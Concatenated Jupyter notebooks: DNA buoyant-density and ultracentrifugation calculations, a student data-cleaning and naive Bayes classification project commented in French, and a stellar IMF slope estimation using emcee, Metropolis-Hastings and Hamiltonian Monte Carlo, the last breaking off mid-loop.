* Needed to determine whether the Clay et al., 2003 function describing diffusion is applicable to our data

> standard conditions from: Clay et al., 2003. Eur Biophys J

* Standard conditions:
  * 44k rev/min for Beckman XL-A
  * An-50 Ti Rotor
  * 44.77k rev/min for Beckman model E
  * 35k rev/min for preparative ultra-cfg & fractionation
  * De Sario et al., 1995: vertical rotor: VTi90 (Beckman)
  * 35k rpm for 16.5 h
* Our conditions:
  * speed (R) = 55k rev/min
  * radius top/bottom (cm) = 2.6, 4.85
  * angular velocity: omega = 2 * pi * R / 60; the sedimentation equations below use its square, `w = ((2 * 3.14159 * R)/60)^2`
  * TLA110 rotor
###Code
import numpy as np
%load_ext rpy2.ipython
%%R
library(ggplot2)
library(dplyr)
###Output
_____no_output_____
###Markdown
Beckman XL-A

Beckman model E

Angular velocity (omega)
###Code
# angular velocity (rad/s): our setup
angular_vel_f = lambda R: (2 * 3.14159 * R / 60)
print(angular_vel_f(55000))
# angular velocity (rad/s): De Sario et al., 1995
print(angular_vel_f(35000))
###Output
5759.58166667
3665.18833333
###Markdown
Meselson et al., 1957 equation on s.d. of band due to diffusion

\begin{equation}
\sigma^2 = \frac{RT}{M_{PX_n}\bar{\upsilon}_{PX_n} \left(\frac{d\rho}{dr}\right)_{r_0} \omega^2 r_0}
\end{equation}

* R = gas constant
* T = absolute temperature
* M = molecular weight
* PX_n = macromolecular electrolyte
* v = partial specific volume (mL/g)
* w = angular velocity
* r_0 = distance between the band center and the rotor center
* dp/dr = density gradient

(A small numeric sketch of this relation follows the rotor details below.)

Time to equilibrium: vertical rotor

radius_max - radius_min = width_of_tube

* VTi90 Rotor
  * radius_max = 71.1 mm
  * radius_min = 57.9 mm
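As a quick numeric illustration of the Meselson relation, a Python sketch with purely illustrative cgs values (these are not our measured parameters):
###Code
import numpy as np

def meselson_sigma(M, v_bar, dp_dr, rpm, r0, temp=296.15):
    """Band s.d. (cm) from sigma^2 = RT / (M v (dp/dr) w^2 r0); all inputs in cgs units."""
    R = 8.3145e7                        # gas constant, erg/(mol*K)
    w = 2 * np.pi * rpm / 60.0          # angular velocity, rad/s
    return np.sqrt(R * temp / (M * v_bar * dp_dr * w**2 * r0))

# illustrative example: ~50 kb of dry cesium DNA in a gradient of ~0.1 (g/cm^3)/cm
print(meselson_sigma(M=50000 * 882, v_bar=0.55, dp_dr=0.1, rpm=55000, r0=3.7))
###Output
_____no_output_____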
###Code
%%R -w 14 -h 6 -u in
library(ggplot2)
library(reshape)
library(grid)
# radius top,bottom (cm)
r.top = 57.9 / 10
r.bottom = 71.1 / 10
# isoconcentration point
I = sqrt((r.top^2 + r.top * r.bottom + r.bottom^2)/3)
# rpm
R = 35000
# particle density
D = 1.70
# beta^o
B = 1.14e9
# dna in bp from 0.1kb - 100kb
L = seq(100, 100000, 100)
# squared angular velocity
## w = (2*pi*rpm / 60)^2
w = ((2 * 3.14159 * R)/60)^2
# DNA GC content
G.C = seq(0.1, 0.9, 0.05)
# Molecular weight
# M.W in relation to GC content (dsDNA)
A = 313.2
T = 304.2
C = 289.2
G = 329.2
GC = G + C
AT = A + T
#GC2MW = function(x){ x*GC + (1-x)*AT + 157 } # assuming 5' monophosphate on end of molecules
GC2MW = function(x){ x*GC + (1-x)*AT }
M.W = sapply(G.C, GC2MW)
# buoyant density
## GC_fraction = (p - 1.66) / 0.098
GC2buoyant.density = function(x){ (x * 0.098) + 1.66 }
B.D = GC2buoyant.density(G.C)
# radius of the isoconcentration point from cfg center (AKA: r.p)
## position of the particle at equilibrium
buoyant.density2radius = function(x){ sqrt( ((x-D)*2*B/w) + I^2 ) }
P = buoyant.density2radius(B.D)
# calculating S
S.fun = function(L){ 2.8 + (0.00834 * (L*M.W)^0.479) }
S = t(sapply( L, S.fun ))
# calculating T
T = matrix(ncol=17, nrow=length(L))
for(i in 1:ncol(S)){
T[,i] = 1.13e14 * B * (D-1) / (R^4 * P[i]^2 * S[,i])
}
## formating
T = as.data.frame(T)
colnames(T) = G.C
T$dna_size__kb = L / 1000
T.m = melt(T, id.vars=c('dna_size__kb'))
colnames(T.m) = c('dna_size__kb', 'GC_content', 'time__h')
#T.m$GC_content = as.numeric(as.character(T.m$GC_content))
## plotting
p = ggplot(T.m, aes(dna_size__kb, time__h, color=GC_content, group=GC_content)) +
geom_line() +
scale_y_continuous(limits=c(0,175)) +
labs(x='DNA length (kb)', y='Time (hr)') +
scale_color_discrete(name='GC content') +
#geom_hline(yintercept=66, linetype='dashed', alpha=0.5) +
theme( text = element_text(size=18) )
#print(p)
# plotting at small scale
p.sub = ggplot(T.m, aes(dna_size__kb, time__h, color=GC_content, group=GC_content)) +
geom_line() +
scale_x_continuous(limits=c(0,5)) +
scale_y_continuous(limits=c(0,175)) +
labs(x='DNA length (kb)', y='Time (hr)') +
scale_color_discrete(name='GC content') +
#geom_hline(yintercept=66, linetype='dashed', alpha=0.5) +
theme(
text = element_text(size=14),
legend.position = 'none'
)
vp = viewport(width=0.43, height=0.52, x = 0.65, y = 0.68)
print(p)
print(p.sub, vp=vp)
###Output
_____no_output_____
###Markdown
Plotting band s.d. as defined in the ultra-centrifugation technical manual

density gradient

\begin{equation}
\frac{d\rho}{dr} = \frac{\omega^2 r}{\beta}
\end{equation}

band standard deviation

\begin{equation}
\sigma^2 = \frac{\theta}{M_{app}}\frac{RT}{\left(\frac{d\rho}{dr}\right)_{eff} \omega^2 r_o}
\end{equation}

combined

\begin{equation}
\sigma^2 = \frac{\theta}{M_{app}}\frac{RT}{\frac{\omega^4 r_o^2}{\beta}}
\end{equation}

buoyant density of a molecule

\begin{equation}
\theta = \rho_i + \frac{\omega^2}{2\beta}(r_o^2 - r_1^2)
\end{equation}

standard deviation due to diffusion (Clay et al., 2003)

\begin{equation}
\sigma_{diffusion}^2 = \left(\frac{100\%}{0.098}\right)^2 \frac{\rho RT}{\beta_B^2 G M_{Cs}} \frac{1}{1000\,l}
\end{equation}
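The R cell below evaluates this expression; for cross-checking individual values, here is an equivalent Python sketch of the same formula (the function name is mine; it uses the same default constants as the R function that follows):
###Code
import numpy as np

def clay_sd(p=1.72, L=50000, temp=298, B=1.195e9, G=7.87e-10, M=882):
    """s.d. in %G+C from the Clay et al. (2003) diffusion expression (cgs constants)."""
    R = 8.3145e7  # gas constant, erg/(mol*K)
    var = (100 / 0.098) ** 2 * (p * R * temp) / (B**2 * G * L * M)
    return np.sqrt(var)

print(clay_sd(L=4000))  # s.d. at a 4 kb fragment length
###Output
_____no_output_____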
###Code
%%R
# gas constant
R = 8.3144621e7 #J / mol*K
# temp
T = 273.15 + 23 # 23oC
# rotor speed (rpm)
S = 55000
# beta^o (note: not used below; calc_s.d takes B = 1.195e9 as its default argument)
beta = 1.14 * 10^-9
#beta = 1.195 * 10^-10
# G
G = 7.87 * 10^10 #cgs
# angular velocity
## 2*pi*rpm / 60
omega = 2 * pi * S /60
# GC
GC = seq(0,1,0.1)
# lengths
lens = seq(1000, 100000, 10000)
# molecular weight
GC2MW.dry = function(x){
A = 313.2
T = 304.2
C = 289.2
G = 329.2
GC = G + C
AT = A + T
x*GC + (1-x)*AT
}
#GC2MW = function(x){ x*GC + (1-x)*AT }
M.dry = sapply(GC, GC2MW.dry)
GC2MW.dryCS = function(n){
#n = number of bases
#base pair = 665 daltons
#base pair per dry cesium DNA = 665 * 4/3 ~= 882
return(n * 882)
}
M.dryCS = sapply(lens, GC2MW.dryCS)
# BD
GC2BD = function(x){
(x * 0.098) + 1.66
}
rho = sapply(GC, GC2BD)
# sd
calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){
R = 8.3145e7
x = (100 / 0.098)^2 * ((p*R*T)/(B^2*G*L*M))
return(sqrt(x))
}
# run
p=seq(1.7, 1.75, 0.01)
L=seq(500, 50000, 500)
m = outer(p, L, calc_s.d)
rownames(m) = p
colnames(m) = L
%%R
heatmap(m, Rowv=NA, Colv=NA)
%%R -w 500 -h 350
df = as.data.frame(list('fragment_length'=as.numeric(colnames(m)), 'GC_sd'=m[1,]))
#df$GC_sd = sqrt(df$GC_var)
ggplot(df, aes(fragment_length, GC_sd)) +
geom_line() +
geom_vline(xintercept=4000, linetype='dashed', alpha=0.6) +
labs(x='fragment length (bp)', y='G+C s.d.') +
theme(
text = element_text(size=16)
)
###Output
_____no_output_____
###Markdown
__Notes:__

* Small fragment size (<4000 bp) leads to large standard deviations in realized G+C
###Code
%%R
calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){
R = 8.3145e7
sigma_sq = (p*R*T)/(B^2*G*L*M)
return(sqrt(sigma_sq))
}
# run
p=seq(1.7, 1.75, 0.01)
L=seq(500, 50000, 500)
m = outer(p, L, calc_s.d)
rownames(m) = p
colnames(m) = L
head(m)
%%R
heatmap(m, Rowv=NA, Colv=NA)
%%R -w 500 -h 350
BD50 = 0.098 * 0.5 + 1.66   # buoyant density at 50% G+C (= 1.709)
# index the row by name: the tabulated densities run 1.70-1.75, so take the nearest (1.71)
df = as.data.frame(list('fragment_length'=as.numeric(colnames(m)), 'BD_sd'=m[as.character(round(BD50, 2)),]))
ggplot(df, aes(fragment_length, BD_sd)) +
    geom_line() +
    geom_vline(xintercept=4000, linetype='dashed', alpha=0.6) +
    labs(x='fragment length (bp)', y='buoyant density s.d.') +
theme(
text = element_text(size=16)
)
###Output
_____no_output_____ |
ch_cours/Projet_session_APES_PSY4016.ipynb | ###Markdown
Importer les données
###Code
import pandas as pd
df = pd.read_excel(r'C:\Users\Dylan\Desktop\UdeM_H22\PSY4016_traitementDeDonnees\Base_donnees_APES_modifications.xlsx', header = 0)
#df to manipulate and to test the code more quickly
#!!!the df used for the rest of the code is df_short!!!!
df_short = df[['Age', 'Origine', 'IMC', 'Height', 'Sex']]
#Import the column that describes the format of each variable (nominal, scale) to know later
#whether the column should hold a string or an int/float
df_var_descrip = pd.read_excel(r'C:\Users\Dylan\Desktop\Honor\APES\description_variables_col_ACE.xlsx', header = 0)
#df_var_descrip.head()
df.head()
df_short.head()
#make a pair plot of the numeric variables, with a hue that serves as the
#categorical variable
import seaborn as sns
%matplotlib inline
sns.set()
sns.pairplot(df, hue='Origine', height=2)
###Output
_____no_output_____
###Markdown
Label prediction algorithm
###Code
import sklearn
import numpy as np
from sklearn import model_selection
from sklearn import naive_bayes
# Step 1: choose the model class and the model hyperparameters
model = naive_bayes.GaussianNB() #create the model
#Steps 2 and 3: create the X and y data (define the features)
#Isolate the categorical variable in a separate object so it can be predicted
X_df = df_short.drop('Origine', axis=1)
y_df = df_short['Origine']
# Step 4: fit the model to the data
model.fit(X_df, y_df) #fit on the dataset
#data frame = X_df -> contains the columns Age, IMC, Height, Sex
# the model learns to predict the labels y_df -> Origine.
# Step 5: apply the model
y_model = model.predict(X_df) #prediction
#ERROR here: we see errors in the algorithm's predictions -> it should be 100%.
# the problem is that we applied the model to the same data frame it was fit on...
# this is called a generalization error:
# the model must be applied to new data!
# Display the prediction accuracy
print(f'Prediction accuracy {sklearn.metrics.accuracy_score(y_df, y_model):.2%}')
###Output
_____no_output_____
###Markdown
Missing values and data cleaning

Pseudocode for the data-cleaning section:

* Check whether each column's type is what is expected
* If a cell's type does not match what is expected, clean it by making the values uniform
* Replace the missing values with a common value

Check that every value in each column has the appropriate format (str, int, float).
###Code
#Load the variable names as a list so we can refer to them in the next steps
columns = df.columns.values.tolist()
#Loop over every cell of the df to check whether the cell's type matches what is expected
#If the type does not match, it is corrected
###Output
_____no_output_____
###Markdown
A loop that goes through each cell and checks the type of the data it holds. If a cell is a string while it is expected to be of type int or float, we want to extract the number from the cell by removing its string part, and thus update the cell with the correct value.
###Code
#remove the first element since it is the participants' ID
#to_rm = columns[0]
#columns.remove(to_rm)
#columns = df.columns.values.tolist().pop(0)

#function to strip letters that slipped into cells of type int or float
#This function does not touch the first column of a dataframe, for the simple reason
#that the first column is of type str: it contains the participants' ids
##Caution: this function does not check whether it is normal for a cell to contain letters**
def clean_str_for_num(data_frame):
    columns = data_frame.columns.values.tolist()
    #Columns whose dtype already matches the expected type are skipped below.
    #This prevents stripping letters from nominal/categorical cells and only
    #touches continuous/scale cells where letters slipped in by mistake.
    expected_types = df_var_descrip['Niveau de mesure']
    for position, col in enumerate(columns):
        print(col)
        col_dtype = data_frame[col].dtype   # renamed: 'type' shadowed the builtin type()
        if col_dtype != expected_types[position]:
            for index in range(len(data_frame)):
                cell = data_frame[col][index]
                ##take a str cell and extract the number from it
                if type(cell) is str:
                    temp = cell
                    for character in cell:
                        #If a character is not a digit, blank it out
                        if character.isdigit() is False:
                            cell = cell.replace(character, ' ')
                    print(f'The cell at column {col} and row {index} was {temp} but has been changed to {cell}')
                    data_frame.replace(temp, cell, inplace = True)
#Loop to encode the type of value expected in a cell (e.g. nominal, scale)
#as str or float64. This lets us later compare a df cell with the expected type.
#E.g. if index 1 is supposed to hold a nominal value, we encode str.
for position in range(0,len(df_var_descrip)):
    if df_var_descrip.iat[position,0] == 'Nominales':
        print(position)
        new_cell = 'str'
        df_var_descrip.replace(df_var_descrip.iat[position,0], new_cell, inplace = True)
        print('the change was made for a string')
    elif df_var_descrip.iat[position,0] == 'Echelle':
        new_cell = 'float64'
        df_var_descrip.replace(df_var_descrip.iat[position,0], new_cell, inplace = True)
        print('the change was made for a float')
print(df_var_descrip)
#Skip the columns that are expected to hold strings: letters are only stripped from
#cells expected to be continuous/scale values, where they appear by mistake
expected_types = df_var_descrip['Niveau de mesure']
for position, col in enumerate(columns):
    print(col)
    col_dtype = df[col].dtype
    if col_dtype != expected_types[position]:
        print('type mismatch for this column')
        for index in range(len(df)):
            cell = df[col][index]
            ##take a str cell and extract the number from it
            if type(cell) is str:
                temp = cell
                for character in cell:
                    #If a character is not a digit, blank it out
                    if character.isdigit() is False:
                        cell = cell.replace(character, ' ')
                print(f'The cell at column {col} and row {index} was {temp} but has been changed to {cell}')
                df.replace(temp, cell, inplace = True)
#check the data type of each column,
#then make the missing-value markers uniform so that they all become NaN
#This will later allow replacing them with e.g. the column mean or median
import numpy as np
for col in columns:
    print(col)
    col_dtype = df[col].dtype   # renamed so it no longer shadows the builtin type()
    print(f'The value type for column {col} is {col_dtype}')
    for index in range(0, len(df)):
        prev_value = df[col][index]
        valeur = df[col][index]
        if valeur == ' ' or valeur == '#NULL!' or valeur == 'NaN':
            df.loc[index, col] = np.nan   # a real NaN, so isnull()/fillna() can find it
            print(f'the value at position {col} {index} was {prev_value} and has been changed to {df.loc[index, col]}')
for col in columns:
    #print(col)
    has_nan = df[col].isnull().values.any()   # renamed: 'bool' shadowed the builtin
    print(f'Column {col} contains at least one NaN : {has_nan}')
clean_str_for_num(df)
###Output
_____no_output_____
###Markdown
Display all the cells that contain NaN
###Code
import numpy as np

#get the list of all the df_short variables
ls_col = df_short.columns
print(ls_col)
#CHECK THE NANs one column at a time
for col in ls_col:
    df_na_bool = []   # reset per column so the row indices stay correct
    for index in range(0, len(df_short)):
        valeur = df_short[col][index]
        df_na_bool.append(pd.isna(valeur))   # pd.isna also handles non-numeric cells
    na_index = pd.DataFrame([i for i, x in enumerate(df_na_bool) if x])
    print(f'The rows containing NaN for column {col} are {na_index}')
import numpy as np
df_na_bool = []
#get the list of all the df_short variables
ls_col = df_short.columns
print(ls_col)
#CHECK THE NANs for a single column ('Age')
for index in range(0, len(df_short)):
    valeur = df_short['Age'][index]
    df_na_bool.append(np.isnan(valeur))
na_index = pd.DataFrame([i for i, x in enumerate(df_na_bool) if x])
print(f'The rows containing NaN for this column are {na_index}')
##MISSING DATA
#visualize graphically whether any data are missing
colours = ['#000099', '#ffff00'] # specify the colours - yellow is missing. blue is not missing.
sns.heatmap(df.isnull(), cmap=sns.color_palette(colours))
#percentage of missing data in the df
for col in df_short.columns:
pct_missing = np.mean(df_short[col].isnull())
print('{} - {}%'.format(col, round(pct_missing*100)))
#Replace the missing values with the mean or the median
##CAUTION: DF_SHORT IS MODIFIED HERE
#TO KEEP THE ORIGINAL DF, IT IS BETTER TO WORK ON A COPY
mediane = df_short['IMC'].median()
print(mediane)
df_short['IMC'] = df['IMC'].fillna(mediane)
###Output
_____no_output_____
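###Markdown
An alternative sketch (assuming scikit-learn is available, and that these three columns are numeric) that imputes the median of every numeric column at once, instead of one column at a time:
###Code
from sklearn.impute import SimpleImputer

num_cols = ['Age', 'IMC', 'Height']          # numeric columns of df_short
imputer = SimpleImputer(strategy='median')   # replaces NaN with each column's median
df_short[num_cols] = imputer.fit_transform(df_short[num_cols])
###Output
_____no_output_____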
###Markdown
Cross-validation / Training / Test
###Code
#Extract two groups of data for training
Xtrain = X_df [:-25]
Xtest = X_df [-25:]
ytrain = y_df [:-25]
ytest = y_df [-25:]
# 1. choose the model class
# from sklearn.naive_bayes import GaussianNB
# 2. choose the model hyperparameters
model = naive_bayes.GaussianNB()
#same idea as what is shown further below
#composantes = decomposition.PCA(n_components=2)
#model = naive_bayes.GaussianNB().fit(composantes, ytrain)
#unscaled_clf = pipeline.make_pipeline(
#    decomposition.PCA(n_components=2),
#    naive_bayes.GaussianNB())
# 3. arrange the data
# from sklearn.model_selection import train_test_split
#create two data frames:
#train = used to build the model
#test = used to evaluate it
Xtrain, Xtest, ytrain, ytest = model_selection.train_test_split(
    X_df, y_df,
    random_state=1)
#this creates the train/test data frames
# random_state=1 -> makes the same split reproducible;
# each call to model_selection.train_test_split would otherwise create a new split
# 4. fit the model to the data
model.fit(Xtrain, ytrain)
#the rules are learned from ytrain, fitted on our data frame Xtrain
# 5. apply the model to new data
y_model = model.predict(Xtest)
#y_model is predicted from Xtest, not from Xtrain
#this gives a prediction on a new data frame; otherwise we get a generalization error
# Use the accuracy_score utility
# to display the fraction of predicted labels that match their true value:
sklearn.metrics.accuracy_score(ytest, y_model)
#compares ytest (what must be predicted) with the predicted y_model
# only about 3% error here
# y_model predicts about 97% of the values correctly
###Output
_____no_output_____
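###Markdown
A single train/test split gives only one accuracy estimate. A short k-fold cross-validation sketch (same model class, same X_df/y_df as above) averages that estimate over several splits:
###Code
scores = model_selection.cross_val_score(naive_bayes.GaussianNB(), X_df, y_df, cv=5)
print('Accuracy per fold:', scores)
print(f'Mean accuracy: {scores.mean():.2%}')
###Output
_____no_output_____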
###Markdown
Not certain about this section: it does not use the data above (it runs on the sklearn wine dataset instead)
###Code
import matplotlib.pyplot as plt
import seaborn as sns
import sklearn
import numpy as np
RANDOM_STATE = 42
FIG_SIZE = (10, 7)
#features, target = sklearn.datasets.load_wine(return_X_y=True)
from sklearn import datasets
features, target = datasets.load_wine(return_X_y=True)
from sklearn import model_selection
X_train, X_test, y_train, y_test =model_selection.train_test_split(features, target,
test_size=0.30,
random_state=RANDOM_STATE)
# Fit the data and predict using GNB and PCA in a pipeline (component extraction),
# for the unscaled data
from sklearn import pipeline
from sklearn import decomposition
from sklearn import naive_bayes
# unscaled_clf = sklearn.pipeline.make_pipeline(decomposition.PCA(n_components=2), naive_bayes.GaussianNB())
unscaled_clf = pipeline.make_pipeline(
    decomposition.PCA(n_components=2), #compute the two most important components
    naive_bayes.GaussianNB()) # performs the prediction
unscaled_clf.fit(X_train, y_train) # fit on the X_train and y_train data
pred_test = unscaled_clf.predict(X_test)
# for the scaled data
# std_clf = sklearn.pipeline.make_pipeline(preprocessing.StandardScaler(), decomposition.PCA(n_components=2), naive_bayes.GaussianNB())
std_clf = pipeline.make_pipeline(sklearn.preprocessing.StandardScaler(), #add standardization
decomposition.PCA(n_components=2),
naive_bayes.GaussianNB())
std_clf.fit(X_train, y_train) #the fit
pred_test_std = std_clf.predict(X_test) # the prediction
pred_test_std
# Extract the PCA step from the pipeline
pca = unscaled_clf.named_steps['pca']
pca_std = std_clf.named_steps['pca']
# Apply the PCA, without and with scaling, to the X_train data
# for visualization.
X_train_transformed = pca.transform(X_train)
scaler = std_clf.named_steps['standardscaler']
X_train_std_transformed = pca_std.transform(scaler.transform(X_train))
# visualize the dataset, standardized
# or not, after the PCA
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=FIG_SIZE)
for l, c, m in zip(range(0, 3), ('blue', 'red', 'green'), ('^', 's', 'o')):
ax1.scatter(X_train_transformed[y_train == l, 0],
X_train_transformed[y_train == l, 1],
color=c,
                label='group %s' % l,
alpha=0.5,
marker=m
)
for l, c, m in zip(range(0, 3), ('blue', 'red', 'green'), ('^', 's', 'o')):
ax2.scatter(X_train_std_transformed[y_train == l, 0],
X_train_std_transformed[y_train == l, 1],
color=c,
                label='group %s' % l,
alpha=0.5,
marker=m
)
ax1.set_title('training data NOT standardized, after PCA')
ax2.set_title('training data standardized, after PCA')
for ax in (ax1, ax2):
    ax.set_xlabel('1st principal component')
    ax.set_ylabel('2nd principal component')
ax.legend(loc='upper right')
ax.grid()
plt.tight_layout()
plt.show()
#Exercise: try to implement the ROC curve on df_short
#(note: df_short has no .target attribute, so the line below raises an AttributeError as written)
df_short.target
###Output
_____no_output_____ |
imf.ipynb | ###Markdown
Stellar Initial Mass Function (IMF)

We are going to use a Salpeter IMF to generate stellar IMF data and then use MCMC to estimate the slope. The Salpeter IMF is given by:

$\frac{dN}{dM} \propto \left(\frac{M}{M_\odot}\right)^{-\alpha} \quad \mathrm{or} \quad \frac{dN}{d\log M} \propto \left(\frac{M}{M_\odot}\right)^{1-\alpha}$
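Note that for a pure power law truncated to [M_min, M_max] the CDF can be inverted in closed form, so the rejection sampler below is not strictly necessary. A vectorized inverse-CDF sketch (the function name is illustrative; it is equivalent in distribution to the sampler that follows):
###Code
import numpy as np

def sample_salpeter_invcdf(n, alpha=2.35, m_min=1.0, m_max=100.0, seed=None):
    """Draw n masses from dN/dM ~ M^-alpha on [m_min, m_max] by inverting the CDF."""
    rng = np.random.default_rng(seed)
    u = rng.uniform(size=n)
    a = 1.0 - alpha
    # F^-1(u) = [m_min^a + u (m_max^a - m_min^a)]^(1/a)
    return (m_min**a + u * (m_max**a - m_min**a)) ** (1.0 / a)

# quick usage check:
# m = sample_salpeter_invcdf(10)
###Output
_____no_output_____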
###Code
import numpy as np
import matplotlib.pyplot as plt
import copy
import corner
import emcee
%matplotlib inline
def sampleFromSalpeter(N,alpha,M_min,M_max):
# Draw random samples from a Salpeter IMF.
# N ... number of samples.
# alpha ... power-law index.
# M_min ... lower bound of mass interval.
# M_max ... upper bound of mass interval.
# Convert limits from M to logM.
log_M_Min = np.log(M_min)
log_M_Max = np.log(M_max)
# Since Salpeter SMF has a negative slope the maximum likelihood occurs at M_min
maxlik = M_min**(1.0 - alpha)
# Prepare array for output masses.
Masses = []
# Fill in array.
while (len(Masses) < N):
# Draw a candidate from logM interval.
logM = np.random.uniform(log_M_Min,log_M_Max)
M = np.exp(logM)
        # Compute likelihood of candidate from the Salpeter IMF.
likelihood = M**(1.0 - alpha)
# Accept randomly.
u = np.random.uniform(0.0,maxlik)
if (u < likelihood):
Masses.append(M)
return Masses
# and now generate the data
N = 1000000 # Draw 1 Million stellar masses.
alpha = 2.35
M_min = 1.0
M_max = 100.0
log_M_min = np.log(M_min)  # natural log, consistent with the gradient used in the HMC section
log_M_max = np.log(M_max)
Masses = sampleFromSalpeter(N, alpha, M_min, M_max)
LogM = np.log(np.array(Masses))
D = np.mean(LogM)*N
###Output
_____no_output_____
###Markdown
Here we have created a set of test stellar mass data, distributed according to the Salpeter IMF, and now we will perform an MCMC to estimate the slope. We are then given a set of N stellar masses, with negligible errors in the measurements. Assuming that the minimum and maximum masses are known, the likelihood of the problem is: $\mathcal L(\{M_1,M_2,\ldots,M_N\};\alpha) = \prod_{n=1}^N p(M_n|\alpha) = \prod_{n=1}^N c\left(\frac{M_n}{M_\odot}\right)^{-\alpha}$where the normalization constant c can be found by:$\int_{M_{min}}^{M_{max}}c M^{-\alpha} dM = 1 \Rightarrow c\frac{M_{max}^{1-\alpha}-M_{min}^{1-\alpha}}{1-\alpha}=1$ 1) EMCEE MCMC
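Taking the log (a small bridging step added here) gives exactly the quantity that `ln_likelihood` below works with, using $D = \sum_{n=1}^N \ln M_n$:$\ln \mathcal L = N\ln c - \alpha \sum_{n=1}^N \ln M_n = N\ln c - \alpha D$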
###Code
def ln_likelihood(params, D, N, M_min, M_max):
# Define logarithmic likelihood function.
# params ... array of fit params, here just alpha
# D ... sum over log(M_n)
# N ... number of data points.
# M_min ... lower limit of mass interval
# M_max ... upper limit of mass interval
alpha = params[0] # extract alpha
# Compute normalisation constant.
c = (1.0 - alpha)/(M_max**(1.0-alpha)
- M_min**(1.0-alpha))
# return log likelihood.
return N*np.log(c) - alpha*D
def ln_prior(params):
return 0.0
def ln_posterior(params, D, N, M_min, M_max):
lp = ln_prior(params)
ll = ln_likelihood(params, D, N, M_min, M_max)
return lp+ll
# Running the MCMC
nwalkers, ndim = 100, 1  # a single fitted parameter: alpha
# The array of initial guesses
initial = np.array([3.0])
p0 = [initial + 1e-2 * np.random.randn(ndim) for i in range(nwalkers)]
sampler = emcee.EnsembleSampler(nwalkers, ndim, ln_posterior, args=(D, N, M_min, M_max))
pos, prob, state = sampler.run_mcmc(p0, 1000)
# Plot the trace
fig, ax = plt.subplots(1,1, figsize=(4,4))
# Plot trace
for j in range(nwalkers):
ax.plot(sampler.chain[j,:,0], alpha=0.1, color='k')
plt.ylim(2.2,2.4)
plt.show()
print('The alpha is',pos[0,0])
# # Reset the sampler, restart the sampler at this current position,
# # which we saved from before and called "pos"
# sampler.reset()
# pos,prob,state = sampler.run_mcmc(pos,1000)
# corner.corner(sampler.flatchain)
# plt.show()
###Output
_____no_output_____
###Markdown
2) We will give an example using the Metropolis-Hastings MCMC.
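The acceptance rule coded below is the standard Metropolis rule for a symmetric Gaussian proposal: accept the candidate with probability $\min\left(1,\; e^{\ln\mathcal L_{new} - \ln\mathcal L_{old}}\right)$.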
###Code
# initial guess for alpha as a list.
guess = [3.0]
# Prepare storing MCMC chain as list of lists.
A = [guess]
# define stepsize of MCMC.
stepsizes = [0.0005] # list of stepsizes
accepted = 0.0
# Metropolis-Hastings with 10,000 iterations.
for n in range(10000):
old_alpha = A[len(A)-1] # old parameter value as array
old_loglik = ln_likelihood(old_alpha, D, N, M_min,M_max)
# Suggest new candidate from Gaussian proposal distribution.
new_alpha = np.zeros([len(old_alpha)])
for i in range(len(old_alpha)):
# Use stepsize provided for every dimension.
new_alpha[i] = np.random.normal(old_alpha[i], stepsizes[i])
new_loglik = ln_likelihood(new_alpha, D, N, M_min,M_max)
    # Accept new candidate in Monte-Carlo fashion.
if (new_loglik > old_loglik):
A.append(new_alpha)
accepted = accepted + 1.0 # monitor acceptance
else:
u = np.random.uniform(0.0,1.0)
if (u < np.exp(new_loglik - old_loglik)):
A.append(new_alpha)
accepted = accepted + 1.0 # monitor acceptance
else:
A.append(old_alpha)
print("Acceptance rate = "+str(accepted/10000.0))
# Discard first half of MCMC chain and thin out the rest.
Clean = []
for n in range(5000,10000):
if (n % 10 == 0):
Clean.append(A[n][0])
# Print Monte-Carlo estimate of alpha.
print("Mean: "+str(np.mean(Clean)))
print("Sigma: "+str(np.std(Clean)))
plt.figure(1)
plt.hist(Clean, 30, histtype='step', lw=2)
plt.xticks([2.346,2.348,2.35,2.352,2.354],
[2.346,2.348,2.35,2.352,2.354])
plt.xlim(2.345,2.355)
plt.xlabel(r'$\alpha$', fontsize=16)
plt.ylabel(r'$\cal L($Data$;\alpha)$', fontsize=16)
plt.show()
###Output
_____no_output_____
###Markdown
3) We will now perform the same procedure with Hamiltonian dynamics
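HMC needs the gradient of the log-likelihood. Writing $\ln c = \ln(1-\alpha) - \ln\left(M_{max}^{1-\alpha} - M_{min}^{1-\alpha}\right)$ and differentiating (a bridging step added here; the code in `evaluateGradient` below assembles it piecewise) gives$\frac{d\ln\mathcal L}{d\alpha} = -D - \frac{N}{1-\alpha}\left[1 + (1-\alpha)\frac{\ln(M_{min})\,M_{min}^{1-\alpha} - \ln(M_{max})\,M_{max}^{1-\alpha}}{M_{max}^{1-\alpha} - M_{min}^{1-\alpha}}\right]$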
###Code
def evaluateGradient(params, D, N, M_min, M_max, logMmin, logMmax):
alpha = params[0] # extract alpha
grad = logMmin*M_min**(1.0-alpha) - logMmax*M_max**(1.0-alpha)
grad = 1.0 + grad*(1.0 - alpha)/(M_max**(1.0-alpha)
- M_min**(1.0-alpha))
grad = -D - N*grad/(1.0 - alpha)
return np.array(grad)
guess = [3.0]
A = [guess]
# define stepsize of HMC.
stepsize = 0.00004
accepted = 0.0
# Hamiltonian Monte-Carlo.
for n in range(50000):
old_alpha = A[len(A)-1]
# Remember, energy = -loglik
old_energy = - ln_likelihood(old_alpha, D, N, M_min, M_max)
old_grad = - evaluateGradient(old_alpha, D, N, M_min, M_max, log_M_min, log_M_max)
    new_alpha = copy.copy(old_alpha) # copy of current position (shallow copy is enough for a flat list)
    new_grad = copy.copy(old_grad) # copy of current gradient
# Suggest new candidate using gradient + Hamiltonian dynamics.
# draw random momentum vector from unit Gaussian.
p = np.random.normal(0.0, 1.0)
H = np.dot(p,p)/2.0 + old_energy # compute Hamiltonian
# Do 5 Leapfrog steps.
for tau in range(5):
# make half step in p
p = p - stepsize*new_grad/2.0
# make full step in alpha
new_alpha = new_alpha + stepsize*p
# compute new gradient
        new_grad = - evaluateGradient(new_alpha, D, N, M_min,
                              M_max, log_M_min, log_M_max)
# make half step in p
p = p - stepsize*new_grad/2.0
# Compute new Hamiltonian. Remember, energy = -loglik.
new_energy = - ln_likelihood(new_alpha, D, N, M_min,
M_max)
    new_grad = - evaluateGradient(new_alpha, D, N, M_min,
                              M_max, log_M_min, log_M_max)
newH = np.dot(p,p)/2.0 + new_energy
dH = newH - H
# Accept new candidate in Monte-Carlo fashion.
if (dH < 0.0):
A.append(new_alpha)
accepted = accepted + 1.0
else:
u = np.random.uniform(0.0,1.0)
if (u < np.exp(-dH)):
